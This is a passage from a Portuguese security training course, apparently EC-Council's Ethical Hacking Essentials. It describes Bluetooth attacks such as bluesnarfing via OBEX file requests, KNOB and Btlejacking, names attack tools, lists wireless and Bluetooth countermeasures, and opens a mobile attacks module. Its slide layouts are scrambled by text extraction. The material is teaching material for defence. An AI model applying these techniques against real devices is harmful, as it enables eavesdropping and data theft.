fabricante, modelo do
compartilhados, como
dispositivo e versão do informações sendo
pressionamentos de tecla, bate-papos e documentos
firmware compartilhadas
hackear bluetooth
O hacking de Bluetooth refere-se à exploração de vulnerabilidades de implementação de pilha Bluetooth para

comprometer dados confidenciais em dispositivos e redes habilitados para Bluetooth. Os dispositivos
habilitados para Bluetooth se conectam e se comunicam sem fio por meio de redes ad-hoc conhecidas como piconets.
Os invasores podem obter informações hackeando o dispositivo habilitado para Bluetooth alvo de outro
dispositivo habilitado para Bluetooth.

A seguir estão alguns ataques a dispositivos Bluetooth:
ÿ Bluesmacking: Um ataque Bluesmacking ocorre quando um invasor envia um pacote de ping superdimensionado
para o dispositivo da vítima, causando um estouro de buffer. Esse tipo de ataque é semelhante a um ataque
de ping da morte do Protocolo de Mensagens de Controle da Internet (ICMP).
ÿ Bluejacking: Bluejacking é o uso do Bluetooth para enviar mensagens aos usuários sem o consentimento do
destinatário, semelhante ao spam de e-mail. Antes de qualquer comunicação Bluetooth, o dispositivo que
inicia a conexão deve fornecer um nome que é exibido na tela do destinatário. Como esse nome é definido
pelo usuário, ele pode ser definido como uma mensagem ou anúncio irritante. Estritamente falando, o
Bluejacking não causa nenhum dano ao dispositivo receptor. No entanto, pode ser irritante e perturbador para
as vítimas.
ÿ Bluesnarfing: Bluesnarfing é um método de obter acesso a dados confidenciais em um dispositivo habilitado

para Bluetooth. Um invasor dentro do alcance de um alvo pode usar um software especializado para obter os
dados armazenados no dispositivo da vítima. Para realizar o Bluesnarfing, um invasor explora uma
vulnerabilidade no protocolo Object Exchange (OBEX) que o Bluetooth usa para trocar informações. O invasor
se conecta ao alvo e executa uma operação GET para arquivos com nomes conhecidos ou adivinhados
corretamente, como /pb.vcf para a lista telefônica do dispositivo ou telecom /cal.vcs para o arquivo de
calendário do dispositivo.
ÿ BlueSniff: BlueSniff é um código de prova de conceito para um utilitário de direção Bluetooth. É útil para localizar
dispositivos Bluetooth ocultos e detectáveis. Ele opera no Linux.
ÿ Bluebugging: Bluebugging é um ataque no qual um invasor obtém acesso remoto a um dispositivo habilitado
para Bluetooth sem o conhecimento da vítima. Nesse ataque, um invasor fareja informações confidenciais e
pode realizar atividades maliciosas, como interceptar chamadas telefônicas e mensagens e encaminhar
chamadas e mensagens de texto.
ÿ BluePrinting: BluePrinting é uma técnica de pegada executada por um invasor para determinar a marca e o
modelo de um dispositivo habilitado para Bluetooth de destino. Os invasores coletam essas informações para
criar infográficos do modelo, fabricante etc. e os analisam para determinar se o dispositivo possui
vulnerabilidades exploráveis.
ÿ Btlejacking: Um ataque de Btlejacking é prejudicial para dispositivos Bluetooth de baixa energia (BLE).
O invasor pode farejar, bloquear e assumir o controle da transmissão de dados entre dispositivos BLE
executando um ataque MITM. Após uma tentativa bem-sucedida, o invasor também pode ignorar os
mecanismos de segurança e ouvir as informações que estão sendo compartilhadas. Para implementar esse
ataque, o invasor deve usar equipamento embutido em firmware acessível e codificação de software menor.
ÿ Ataque KNOB: Um ataque de Negociação de Chave de Bluetooth (KNOB) permite que um invasor viole os
mecanismos de segurança do Bluetooth e execute um ataque MITM em dispositivos emparelhados sem ser
rastreado. O invasor aproveita uma vulnerabilidade no padrão sem fio Bluetooth e escuta todos os dados
compartilhados na rede, como pressionamentos de tecla, bate-papos e documentos. Um ataque KNOB é
especialmente prejudicial para dois dispositivos habilitados para Bluetooth que compartilham chaves
criptografadas. O ataque é lançado em protocolos de comunicação de curta distância do Bluetooth negociando
as chaves de criptografia necessárias para serem compartilhadas entre os nós para estabelecer uma conexão.

ÿ Ataque de falsificação de MAC: Um ataque de falsificação de MAC é um ataque passivo no qual os invasores
falsificam o endereço MAC de um dispositivo habilitado para Bluetooth de destino para interceptar ou manipular
os dados enviados ao dispositivo de destino.
ÿ Ataque Man-in-the-Middle/representação: Em um ataque MITM/representação, os invasores manipulam os dados

transmitidos entre dispositivos que se comunicam por meio de uma conexão Bluetooth (piconet). Durante este
ataque, os dispositivos destinados a emparelhar uns com os outros, sem saber, emparelham com o dispositivo
do invasor, permitindo assim que o invasor intercepte e manipule os dados transmitidos na piconet.

Ameaças Bluetooth
Vazamento de calendários e
Dispositivos de escuta
Catálogos de Endereços
O invasor pode instruir o usuário
O invasor pode roubar as
fazer uma chamada telefônica para
informações pessoais de um usuário
outros telefones sem qualquer
e usá-las para fins maliciosos
interação do usuário; eles podem até
gravar a conversa do usuário
Enviando Mensagens SMS Causando Perdas Financeiras

Os terroristas podem enviar falsas Os hackers podem enviar muitas
ameaças de bomba às companhias mensagens MMS com o telefone de um
aéreas usando os telefones de usuários legítimos usuário internacional , resultando em uma
conta telefônica alta
Ameaças Bluetooth (continuação)
Controle remoto Engenharia social

Os hackers podem controlar remotamente Os invasores enganam os usuários do
um telefone para fazer chamadas Bluetooth para diminuir a segurança

telefônicas ou conectar-se à Internet ou desabilitar a autenticação para
conexões Bluetooth para parear com

eles, roubando informações
Código malicioso Vulnerabilidades de protocolo
Worms de celular podem explorar uma Os invasores exploram pareamentos de

conexão Bluetooth para Bluetooth e protocolos de comunicação
replicar e espalhar-se para roubar dados, fazer chamadas, enviar
mensagens, realizar ataques DoS em um
dispositivo, iniciar espionagem de telefone, etc.
Ameaças Bluetooth
Semelhante às redes sem fio, os dispositivos Bluetooth também apresentam várias ameaças à segurança. Os invasores
visam vulnerabilidades nas configurações de segurança dos dispositivos Bluetooth para obter acesso a informações
confidenciais e à rede à qual estão conectados.

A seguir estão algumas das ameaças de segurança do Bluetooth.
ÿ Vazamento de calendários e catálogos de endereços: invasores podem roubar dados pessoais de um usuário
informações e usá-las para fins maliciosos.
ÿ Dispositivos de escuta: Os invasores podem instruir um smartphone a fazer uma chamada para outros telefones
sem qualquer interação do usuário. Eles podem até gravar as conversas de um usuário.
ÿ Envio de mensagens SMS: Os terroristas podem enviar falsas ameaças de bomba às companhias aéreas usando o
smartphones de usuários legítimos.
ÿ Causando perdas financeiras: os hackers podem enviar muitas mensagens MMS com o telefone de um usuário
internacional, resultando em uma conta telefônica alta.
ÿ Controle remoto: os hackers podem controlar remotamente um smartphone para fazer ligações ou
conecte-se a internet.
ÿ Engenharia social: os invasores podem enganar os usuários de Bluetooth para reduzir a segurança ou desabilitar
a autenticação de conexões Bluetooth para parear com eles e roubar suas informações.
ÿ Código malicioso: worms de smartphone podem explorar uma conexão Bluetooth para replicar e
se espalhou.
ÿ Vulnerabilidades de protocolo: os invasores exploram emparelhamentos Bluetooth e protocolos de comunicação

para roubar dados, fazer chamadas, enviar mensagens, lançar ataques DoS em um dispositivo, espionar
telefones, etc.

Ferramentas de Ataque Bluetooth
BluetoothView Ele monitora a atividade de dispositivos Bluetooth ao seu redor e exibe informações, como nome do dispositivo,
endereço Bluetooth, tipo de dispositivo principal, tipo de dispositivo secundário,
Hora da Primeira Detecção e Hora da Última Detecção
BlueZ
http:// www.bluez.org
BattleJack
https:// github.com
BTCrawlerName
http:// petronius.sourceforge.net
BlueScan
http:// bluescanner.sourceforge.net
Scanner Bluetooth - btCrawler

https:// play.google.com
https:// www.nirsoft.net
Ferramentas de Ataque Bluetooth
ÿ BluetoothView
Fonte: https:// www.nirsoft.net
BluetoothView é um utilitário que monitora a atividade de dispositivos Bluetooth nas proximidades.

Para cada dispositivo Bluetooth detectado, ele exibe informações como nome do dispositivo, endereço
Bluetooth, tipo de dispositivo principal, tipo de dispositivo secundário, hora da primeira detecção e hora da
última detecção. Ele também pode fornecer uma notificação quando um novo dispositivo Bluetooth for
detectado.
Figura 8.34: captura de tela do BluetoothView

A seguir estão algumas ferramentas adicionais de hacking Bluetooth:
ÿ BlueZ (http:// www.bluez.org)
ÿ BattleJack (https:// github.com)
ÿ BTCrawler (http:// petronius.sourceforge.net)
ÿ BlueScan (http:// bluescanner.sourceforge.net)
ÿ Scanner Bluetooth – btCrawler (https://play.google.com)

Fluxo do módulo

Terminologia

Entenda o Bluetooth
Ataques
Contramedidas
Discutir contramedidas de ataque sem fio
Este módulo explica como os invasores invadem redes sem fio para obter dados confidenciais.
Para proteger uma rede sem fio, é importante implementar e adotar contramedidas apropriadas.
Esta seção discute as contramedidas contra ataques sem fio e ferramentas de segurança sem fio.

Contramedidas de ataque sem fio
Melhores práticas para Melhores práticas para Melhores práticas para

Configuração Configurações de SSID Autenticação
Altere o SSID padrão após Use camuflagem de SSID para impedir Escolha Enterprise WPA2 com
configuração WLAN que certas mensagens sem fio padrão autenticação 802.1x em vez de WPA
transmitam o ID para todos e WEP
Defina a senha de acesso do roteador

Implementar WPA2/WPA3
e habilite a proteção do firewall Não use seu SSID, nome da empresa,
Empresa sempre que possível
nome da rede ou qualquer string fácil
Desabilitar transmissões SSID de adivinhar em frases secretas
Desativar a rede quando não for
necessário
Desative o login remoto do
Coloque um firewall ou filtro de
roteador e a administração sem fio
pacotes entre o AP e o corporativo Coloque APs sem fio em um local
intranet seguro
Contramedidas de ataque sem fio
ÿ Melhores Práticas para Configuração
o Altere o SSID padrão após a configuração da WLAN.
o Defina a senha de acesso do roteador e habilite a proteção do firewall.

o Desabilitar transmissões SSID.
o Desative o login do roteador remoto e a administração sem fio.
o Habilitar filtragem de endereço MAC em APs ou roteadores.
o Ative a criptografia nos APs e altere as frases secretas com frequência.
o Feche todas as portas não utilizadas para evitar ataques em Aps.
ÿ Melhores práticas para configurações de SSID
o Use camuflagem de SSID para impedir que certas mensagens sem fio padrão transmitam o SSID para
todos.
o Não use o SSID, nome da empresa, nome da rede ou qualquer string fácil de adivinhar
senhas.
o Coloque um firewall ou filtro de pacotes entre um AP e a Intranet corporativa.
o Limite a força da rede sem fio para que não possa ser detectada fora do
limites da organização.
o Verifique os dispositivos sem fio para problemas de configuração ou configuração regularmente.
o Implementar uma técnica adicional para criptografar o tráfego, como IPSec sobre
sem fio.

ÿ Melhores Práticas para Autenticação
o Escolha WPA2-Enterprise com autenticação 802.1x em vez de WPA ou WEP.
o Implemente WPA2/WPA3-Enterprise sempre que possível.
o Desative a rede quando não for necessária.
o Coloque os APs sem fio em um local seguro.
o Mantenha os drivers de todos os equipamentos sem fio atualizados.
o Use um servidor centralizado para autenticação.
o Habilite a verificação do servidor no lado do cliente usando a autenticação 802.1X para evitar
Ataques MITM.
o Ative a autenticação de dois fatores como uma linha de defesa adicional.
o Implantar sistemas de detecção/detecção de AP não autorizados ou prevenção/detecção de intrusão sem fio para
evitar ataques sem fio.

Contramedidas de Ataque Bluetooth
1 Use padrões não regulares como chaves PIN ao emparelhar dispositivos
2 Mantenha seu dispositivo no modo não detectável (oculto)
3 NÃO aceite solicitações de emparelhamento desconhecidas e inesperadas
Sempre habilite a criptografia ao estabelecer conexão BT com seu PC

4
Verifique todos os dispositivos emparelhados no passado de tempos em tempos

5
e exclua qualquer dispositivo emparelhado do qual você não tenha certeza
6 Mantenha o BT no estado desativado e ative-o somente quando necessário
Contramedidas de Ataque Bluetooth
A seguir estão algumas contramedidas para se defender contra o hacking do Bluetooth.
ÿ Use padrões não regulares como PINs ao emparelhar um dispositivo. As combinações de teclas não devem ser sequenciais
no teclado.
ÿ Mantenha o dispositivo no modo não detectável (oculto).
ÿ Não aceite nenhuma solicitação de emparelhamento desconhecida ou inesperada.
ÿ Verifique regularmente todos os dispositivos emparelhados no passado e exclua qualquer dispositivo emparelhado suspeito.
ÿ Mantenha o Bluetooth no estado desativado e ative-o somente quando necessário. Desativar Bluetooth
imediatamente após a conclusão da tarefa pretendida.
ÿ Sempre ative a criptografia ao estabelecer uma conexão Bluetooth.
ÿ Defina o alcance da rede de um dispositivo habilitado para Bluetooth para o menor e execute o emparelhamento
apenas em uma área segura.
ÿ Instale um software antivírus que suporte software de segurança baseado em host em Bluetooth
dispositivos habilitados.
ÿ Altere as configurações padrão do dispositivo habilitado para Bluetooth para a melhor segurança
padrão.
ÿ Use criptografia de link para todas as conexões Bluetooth.
ÿ
Se várias comunicações sem fio estiverem sendo usadas, certifique-se de que a criptografia esteja habilitada em cada link
da cadeia de comunicação.
ÿ Evite compartilhar informações confidenciais em dispositivos habilitados para Bluetooth.

ÿ Desativar conexões automáticas com redes Wi-Fi públicas para proteger dispositivos Bluetooth
de fontes não seguras.
ÿ Atualize o software e os drivers dos dispositivos Bluetooth e altere regularmente o

senhas.
ÿ Use uma VPN para conexões seguras entre dispositivos Bluetooth.

Ferramentas de segurança sem fio
Cisco adaptável IPS sem fio adaptável (WIPS) fornece detecção e mitigação de ameaças à rede
IPS sem fio sem fio contra ataques mal-intencionados e vulnerabilidades de segurança
AirMagnet WiFi Analyzer PRO

RFProtect
https:// www.arubanetworks.com
WatchGuard WIPS
https:// www.watchguard.com
Planejador AirMagnet
Extreme AirDefense
https:// www.cisco.com https:// www.extremenetworks.com
Ferramentas de segurança sem fio
ÿ Cisco Adaptive Wireless IPS
Fonte: https:// www.cisco.com
O Cisco Adaptive Wireless Intrusion Prevention System (IPS) oferece segurança de rede avançada para
monitoramento dedicado e detecção de anomalias de rede sem fio, acesso não autorizado e ataques de RF.
Totalmente integrada à Cisco Unified Wireless Network, esta solução oferece visibilidade e controle
integrados em toda a rede, sem a necessidade de uma solução de sobreposição. O Adaptive WIPS fornece
detecção e mitigação de ameaças à rede sem fio contra ataques mal-intencionados e vulnerabilidades de
segurança. Ele também oferece aos profissionais de segurança a capacidade de detectar, analisar e
identificar ameaças sem fio.

Figura 8.35: Captura de tela do Cisco Adaptive Wireless IPS
A seguir estão algumas ferramentas adicionais de segurança sem fio:
ÿ AirMagnet WiFi Analyzer PRO (https:// www.netally.com)
ÿ RFProtect (https:// www.arubanetworks.com)
ÿ WatchGuard WIPS (https:// www.watchguard.com)
ÿ AirMagnet Planner (https:// www.netally.com)
ÿ Extreme AirDefense (https:// www.extremenetworks.com)

Resumo do Módulo
Este módulo discutiu a terminologia sem fio, redes sem fio e padrões sem
fio
Cobriu vários tipos de criptografia sem fio
Ele também discutiu técnicas e ferramentas de ataque específicas para redes

sem fio em detalhes
Este módulo também discutiu vários ataques de Bluetooth
Por fim, este módulo terminou com uma discussão detalhada sobre várias
contramedidas de ataque sem fio e ferramentas de segurança sem fio
No próximo módulo, discutiremos em detalhes vários ataques móveis e

contramedidas.
Resumo do Módulo
Este módulo discutiu a terminologia sem fio, redes, padrões e vários tipos de criptografia sem fio. Ele
também discutiu em detalhes técnicas e ferramentas de ataque específicas para redes sem fio. Este
módulo também discutiu vários ataques de Bluetooth. Por fim, o módulo terminou com uma discussão
detalhada sobre várias contramedidas de ataque sem fio e ferramentas de segurança sem fio.
No próximo módulo, discutiremos em detalhes os vários ataques móveis e contramedidas.
MT
EC-Council
CE-Conselho
E
Ethical
HE
Hacking Essentials
Módulo 09
Ataques m óveis e c on tr ame did as

Ataques móveis e contramedidas
1 Compreendendo a anatomia de um ataque móvel
2 Entendendo os vetores de ataque da plataforma móvel
3 Entendendo as vulnerabilidades da plataforma móvel
4 Compreendendo o gerenciamento de dispositivos móveis
5 Visão geral das diretrizes de segurança móvel e ferramentas de segurança
Com os avanços da tecnologia móvel, a mobilidade tornou-se o parâmetro chave para o uso da Internet. O estilo de vida
das pessoas está se tornando cada vez mais dependente de smartphones e tablets. Os dispositivos móveis estão
substituindo desktops e laptops, pois permitem que os usuários não apenas acessem a Internet, e-mail e navegação
GPS, mas também armazenem dados críticos, como listas de contatos, senhas, calendários e credenciais de login. Além
disso, desenvolvimentos recentes no comércio móvel permitiram que os usuários realizassem transações on-line sem
problemas, incluindo compra de mercadorias e aplicativos por meio de redes sem fio, resgate de cupons e tíquetes e
serviços bancários a partir de seus smartphones.
Acreditando que navegar na Internet em dispositivos móveis é seguro, muitos usuários falham em habilitar seu software
de segurança existente. A popularidade dos smartphones e seus mecanismos de segurança moderadamente fortes os
tornaram alvos atraentes para invasores. Este módulo explica as possíveis ameaças às plataformas móveis e fornece
diretrizes para o uso seguro de dispositivos móveis.
ÿ Compreender a anatomia dos ataques móveis
ÿ Compreender os vetores e vulnerabilidades de ataque da plataforma móvel
ÿ Compreender a importância da gestão de dispositivos móveis (MDM)
ÿ Adote várias contramedidas de segurança móvel
ÿ Use várias ferramentas de segurança móvel

Fluxo do módulo
Discutir ataque de plataforma móvel Entenda o dispositivo móvel

Vetores e Vulnerabilidades 02 03 Conceito de Gerenciamento (MDM)
Entenda o celular Discutir ataque móvel

Anatomia de ataque 01 04 Contramedidas
Entenda a anatomia do ataque móvel

A segurança móvel está se tornando cada vez mais desafiadora com o surgimento de ataques complexos
que usam vários vetores de ataque para comprometer os dispositivos móveis. Essas ameaças de
segurança exploram dados críticos, bem como informações financeiras e outros detalhes de usuários
móveis e também podem prejudicar a reputação de redes e organizações móveis.
Esta seção discute áreas vulneráveis no ambiente de negócios móvel, os 10 principais riscos móveis do
OWASP e a anatomia dos ataques móveis.

Áreas vulneráveis no ambiente de negócios móveis
ÿ Os smartphones oferecem
ampla conectividade à
Internet e rede por meio
de diferentes canais, como Dispositivo Wi-Fi
Dispositivo móvel
3G/4G/5G, Loja de aplicativos
Bluetooth, Wi-Fi e
conexões de Internet
computador com fio
Provedor de serviços de telecomunicações
Local na rede Internet
Dispositivo móvel
ÿ Ameaças à segurança podem (Habilitado para Bluetooth)
surgir em diferentes
lugares ao longo desses
Dispositivo móvel VPN corporativa
canais durante a Porta de entrada
Intranet Corporativa
transmissão de dados
- Área Vulnerável
https:// www.ibm.com
Áreas vulneráveis no ambiente de negócios móveis
Fonte: https:// www.ibm.com
Os smartphones estão sendo amplamente utilizados para fins comerciais e pessoais. Assim, eles são um
tesouro para invasores que buscam roubar dados corporativos ou pessoais. As ameaças de segurança aos
dispositivos móveis aumentaram devido ao aumento da conectividade com a Internet, o uso de aplicativos
comerciais e outros, diferentes métodos de comunicação e assim por diante. Além das ameaças de segurança
específicas de dispositivos móveis, os dispositivos móveis também são suscetíveis a muitas outras ameaças
aplicáveis a computadores desktop e laptop, aplicativos da Web, redes etc.
Atualmente, os smartphones oferecem conectividade à Internet e à rede por meio de vários canais, como 3G/
4G/5G, Bluetooth, Wi-Fi ou conexão de computador com fio. As ameaças de segurança podem surgir em
diferentes locais ao longo desses caminhos durante a transmissão de dados.

Figura 9.1: Áreas vulneráveis no ambiente empresarial móvel

Os 10 principais riscos móveis da OWASP - 2016
M1 Uso Indevido da Plataforma

Autorização insegura M6 OPÇÃO
01
M2 Armazenamento de dados inseguro

Qualidade do código do cliente M7 OPÇÃO
01
M3 Comunicação Insegura
adulteração de código M8 OPÇÃO
01
M4 Autenticação insegura
Engenharia reversa M9 OPÇÃO
01
M5 Criptografia insuficiente
Funcionalidade estranha M10 OPÇÃO
01
Os 10 principais riscos móveis da OWASP - 2016
De acordo com a OWASP, os 10 principais riscos móveis são os seguintes:
ÿ M1—Uso Indevido da Plataforma
Esta categoria abrange o uso indevido de um recurso da plataforma ou a falha em usar os controles de segurança da
plataforma. Isso inclui intenções do Android, permissões de plataforma e uso indevido de Touch ID, Keychain ou algum
outro controle de segurança que faça parte do sistema operacional do dispositivo móvel.
Existem várias maneiras pelas quais os aplicativos móveis podem ser expostos a esse risco.
ÿ M2—Armazenamento de dados inseguro
A vulnerabilidade de armazenamento de dados inseguro surge quando as equipes de desenvolvimento assumem que
os usuários e o malware não terão acesso ao sistema de arquivos de um dispositivo móvel e, posteriormente, às
informações confidenciais nos armazenamentos de dados do dispositivo. “Jailbreaking” ou rooting de um dispositivo
móvel contorna os mecanismos de proteção de criptografia. A OWASP recomenda analisar as interfaces de programação
de aplicativos (APIs) de segurança de dados das plataformas e chamá-las adequadamente.
O vazamento não intencional de dados ocorre quando um desenvolvedor inadvertidamente coloca dados confidenciais
em um local no dispositivo móvel que pode ser facilmente acessado por outros aplicativos no dispositivo.
Esse vazamento normalmente é causado por vulnerabilidades no sistema operacional, estruturas, ambiente do
compilador, novo hardware e assim por diante, sem o conhecimento do desenvolvedor. É uma ameaça significativa para
o sistema operacional, plataformas e estruturas; portanto, é importante entender como eles lidam com recursos como
cache de URL, objetos de cookie do navegador e armazenamento de dados HTML5.

ÿ M3—Comunicação Insegura
Esta categoria abrange handshake ruim, versões incorretas de SSL, negociação fraca, comunicação de texto não
criptografado de ativos confidenciais e assim por diante. Essas falhas expõem os dados de um usuário individual
e podem levar ao roubo da conta. Se o adversário interceptar uma conta de administrador, todo o site poderá ser
exposto. Uma configuração pobre de Secure Socket Layer (SSL) também pode facilitar ataques de phishing e
man-in-the-middle (MITM).
ÿ M4—Autenticação insegura
Esta categoria captura noções de autenticação do usuário final ou gerenciamento de sessão ruim, como
o Deixar de identificar o usuário quando necessário
o Falha em manter a identidade do usuário quando necessário.
o Fraquezas no gerenciamento de sessão.
ÿ M5—Criptografia Insuficiente
O código aplica criptografia a um ativo de informações confidenciais. No entanto, a criptografia é insuficiente em

alguns aspectos. Esta categoria abrange problemas em que a criptografia é tentada, mas não executada
corretamente. Essa vulnerabilidade resultará na recuperação não autorizada de informações confidenciais do
dispositivo móvel. Para explorar essa fraqueza, um adversário deve converter com sucesso o código criptografado
ou os dados confidenciais em sua forma original não criptografada devido a algoritmos de criptografia fracos ou
falhas no processo de criptografia.
ÿ M6—Autorização Insegura
Esta categoria captura falhas na autorização (por exemplo, decisões de autorização no lado do cliente e
navegação forçada). É diferente de problemas de autenticação (por exemplo, registro de dispositivo e identificação
do usuário).
Quando um aplicativo não autentica usuários em uma situação em que deveria (por exemplo, conceder acesso
anônimo a algum recurso ou serviço quando o acesso autenticado e autorizado é necessário), trata-se de uma
falha de autenticação e não de autorização.
ÿ M7—Qualidade do Código do Cliente
Esta categoria abrange “Decisões de segurança por meio de entradas não confiáveis” e é uma das categorias
usadas com menos frequência. É a solução para problemas de implementação em nível de código no cliente
móvel, que são distintos dos erros de codificação do lado do servidor. Ele captura estouros de buffer,
vulnerabilidades de string de formato e vários outros erros em nível de código, onde a solução é reescrever algum
código que está sendo executado no dispositivo móvel. A maioria das explorações que se enquadram nessa
categoria resulta na execução de código estrangeiro ou DoS em terminais de servidor remoto (e não no próprio
dispositivo móvel).

ÿ M8—Adultação de Código
Esta categoria abrange patches binários, modificação de recursos locais, gancho de método, swizzling
de método e modificação de memória dinâmica.
Depois que um aplicativo é entregue a um dispositivo móvel, seu código e recursos de dados residem
no dispositivo. Um invasor pode modificar diretamente o código, alterar o conteúdo da memória
dinamicamente, alterar ou substituir as APIs do sistema que o aplicativo usa ou modificar os dados e
recursos do aplicativo. Assim, o invasor pode subverter diretamente o uso pretendido do software para
ganho pessoal ou monetário.
ÿ M9—Engenharia Reversa
Esta categoria inclui a análise do binário principal final para determinar seu código-fonte, bibliotecas,
algoritmos e outros ativos. Softwares como IDA Pro, Hopper, otool e outras ferramentas de inspeção
binária fornecem ao invasor informações sobre o funcionamento interno do aplicativo. Assim, ele/ela
pode explorar outras vulnerabilidades nascentes no aplicativo e descobrir informações sobre servidores
de back-end, constantes criptográficas e cifras e propriedade intelectual.
ÿ M10—Funcionalidade externa
Freqüentemente, os desenvolvedores incluem funcionalidade backdoor oculta ou outros controles

internos de segurança de desenvolvimento que não devem ser lançados em um ambiente de produção.
Por exemplo, um desenvolvedor pode acidentalmente incluir uma senha como um comentário em um
aplicativo híbrido. Outro exemplo envolve a desativação da autenticação de dois fatores durante o teste.
Normalmente, um invasor procura entender a funcionalidade estranha em um aplicativo móvel para

descobrir a funcionalidade oculta nos sistemas de back-end. Os invasores normalmente exploram
essas funcionalidades estranhas diretamente de seus próprios sistemas, sem qualquer envolvimento
dos usuários finais.

Anatomia de um ataque móvel

Ponto 01 – O DISPOSITIVO Ponto 02 – A REDE Ponto 03 – O DATA CENTER / NUVEM
NAVEGADOR
• Phishing • • Man-in-the-Mobile A REDE SERVIDOR WEB

Framing • • Estouro de buffer
Clickjacking • Cache de dados Apple Android Windows RIM • Wi-Fi (sem criptografia/ criptografia • Vulnerabilidades da plataforma
fraca)
• Configuração incorreta do servidor
O SISTEMA
• Ponto de acesso não autorizado
Jailbreak do iOS sem • Script entre sites (XSS)
TELEFONE/SMS • Sniffing de Pacotes
código/fraco • Falsificação de solicitação entre sites
• Ataques de banda base Enraizamento do Android • Man-in-the-Middle (MITM) (XSRF)
Cache de Dados do SO
• SMiShing • Sequestro de Sessão • Validação de entrada fraca
Senhas e Dados Acessíveis
• Envenenamento de DNS • Ataques de Força Bruta
Software carregado por operadora
APLICATIVOS
• SSLStrip • Compartilhamento de recursos entre origens
Nenhuma/criptografia fraca
Código iniciado pelo usuário • Certificado SSL falso • Ataque de Canal Lateral
• Armazenamento de dados
Exploits de dia zero
confidenciais • Sem criptografia/criptografia • Sequestro de BGP • Ataque de hipervisor
Bloqueio de dispositivo
fraca • Validação de SSL imprópria • • Proxies HTTP
Vulnerabilidades do driver do kernel
Manipulação de configuração • Injeção
BASE DE DADOS
Ataque de deputado confuso
dinâmica de tempo de execução • Permissões
não intencionais • Privilégios escalados
• Injeção de SQL
• Acesso ao dispositivo e informações do usuário
• Escalonamento de Privilégios
• Código de terceiros •
Intenção de sequestro • • Despejo de dados
Passagem de diretório zip • • Execução de Comando do SO

MALWARE
Ataque de canal lateral
https:// www.nowsecure.com
Anatomia de um ataque móvel
Fonte: https:// www.nowsecure.com
Devido ao uso extensivo e à implementação de políticas BYOD (traga seu próprio dispositivo) nas organizações,
os dispositivos móveis surgiram como um dos principais alvos de ataques. Os invasores examinam esses
dispositivos em busca de vulnerabilidades. Esses ataques podem envolver o dispositivo e a camada de rede,
o data center ou uma combinação deles.
Os invasores exploram as vulnerabilidades associadas ao seguinte para lançar ataques maliciosos:
Figura 9.2: Anatomia de um ataque móvel

ÿ O Dispositivo
Vulnerabilidades em dispositivos móveis representam riscos significativos para dados pessoais e corporativos
confidenciais. Os invasores que visam o próprio dispositivo podem usar vários pontos de entrada.
Os ataques baseados em dispositivos são dos seguintes tipos:
o Ataques baseados em navegador
Os métodos de ataque baseados em navegador são os seguintes:
• Phishing: e-mails ou pop-ups de phishing redirecionam os usuários para páginas da Web falsas que imitam sites
confiáveis, solicitando que eles enviem suas informações pessoais, como nome de usuário, senha, detalhes
do cartão de crédito, endereço e número do celular. Os usuários móveis têm maior probabilidade de serem
vítimas de sites de phishing porque os dispositivos são pequenos e exibem apenas URLs curtos, mensagens
de aviso limitadas, ícones de bloqueio reduzidos e assim por diante.
• Enquadramento: O enquadramento envolve uma página da Web integrada a outra página da Web usando os
elementos iFrame do HTML. Um invasor explora a funcionalidade iFrame usada no site de destino, incorpora
sua página da Web maliciosa e usa clickjacking para roubar informações confidenciais dos usuários.
• Clickjacking: Clickjacking, também conhecido como ataque de correção da interface do usuário, é uma técnica
maliciosa usada para induzir os usuários da Web a clicar em algo diferente do que eles acham que estão
clicando. Consequentemente, os invasores obtêm informações confidenciais ou assumem o controle do
dispositivo.
• Man-in-the-Mobile: um invasor implanta um código malicioso no dispositivo móvel da vítima para contornar os
sistemas de verificação de senha que enviam senhas descartáveis (OTPs) via SMS ou chamadas de voz.
Depois disso, o malware retransmite as informações coletadas para o invasor.
• Buffer Overflow: Buffer overflow é uma anormalidade em que um programa, enquanto grava dados em um buffer,
ultrapassa o limite pretendido e sobrescreve a memória adjacente. Isso resulta em um comportamento errático
do programa, incluindo erros de acesso à memória, resultados incorretos e travamentos do dispositivo móvel.
• Cache de dados: Os caches de dados em dispositivos móveis armazenam informações que geralmente são
exigidas por esses dispositivos para interagir com aplicativos da Web, preservando recursos escassos e
resultando em melhor tempo de resposta para aplicativos clientes.
Os invasores tentam explorar esses caches de dados para acessar as informações confidenciais armazenadas
neles.
o Ataques baseados em telefone/SMS
Os métodos de ataque baseados em telefone/SMS são os seguintes:
• Ataques de banda base: Os invasores exploram vulnerabilidades no processador de banda base GSM/3GPP de
um telefone, que envia e recebe sinais de rádio para torres de celular.

• SMiShing: SMS phishing (também conhecido como SMiShing) é um tipo de fraude de phishing em que um
invasor usa SMS para enviar mensagens de texto contendo links enganosos de sites maliciosos ou números
de telefone para uma vítima. O invasor engana a vítima para que clique no link ou ligue para o número de
telefone e revele suas informações pessoais, como número do seguro social (SSN), número do cartão de
crédito e nome de usuário e senha do banco online.
o Ataques baseados em aplicativos
Os métodos de ataque baseados em aplicativos são os seguintes:
• Armazenamento de dados confidenciais: alguns aplicativos instalados e usados por usuários móveis
empregam segurança fraca em sua arquitetura de banco de dados, o que os torna alvos de invasores que
buscam hackear e roubar as informações confidenciais do usuário armazenadas em
eles.
• Sem criptografia/criptografia fraca: aplicativos que transmitem dados não criptografados ou criptografados
fracamente são suscetíveis a ataques como sequestro de sessão.
• Validação de SSL imprópria: brechas de segurança no processo de validação de SSL de um aplicativo

podem permitir que invasores contornem a segurança dos dados.
• Manipulação de configuração: os aplicativos podem usar arquivos de configuração externos e bibliotecas

que podem ser exploradas em um ataque de manipulação de configuração. Isso inclui obter acesso não
autorizado a interfaces de administração e armazenamentos de configuração, bem como recuperação de
dados de configuração de texto não criptografado.
• Dynamic Runtime Injection: Os invasores manipulam e abusam do tempo de execução de um aplicativo para
contornar bloqueios de segurança e verificações lógicas, acessar partes privilegiadas de um aplicativo e
até mesmo roubar dados armazenados na memória.
• Permissões não intencionais: aplicativos mal configurados às vezes podem abrir portas para
invasores fornecendo permissões não intencionais.
• Privilégios escalonados: os invasores se envolvem em ataques de escalonamento de privilégios, que se

aproveitam de falhas de design, erros de programação, bugs ou descuidos de configuração para obter
acesso a recursos que geralmente são protegidos de um aplicativo ou usuário.
Outros métodos de ataque baseados em aplicativos incluem sobreposição de interface do usuário/roubo de

pinos, código de terceiros, sequestro intencional, travessia de diretório zip, dados da área de transferência,
esquemas de URL, falsificação de GPS, autenticação local fraca/ausente, integridade/violação/reempacotamento,
ataque de canal lateral, chave de assinatura de aplicativo desprotegida, segurança de transporte de aplicativo,
especialização XML e assim por diante.
o O Sistema
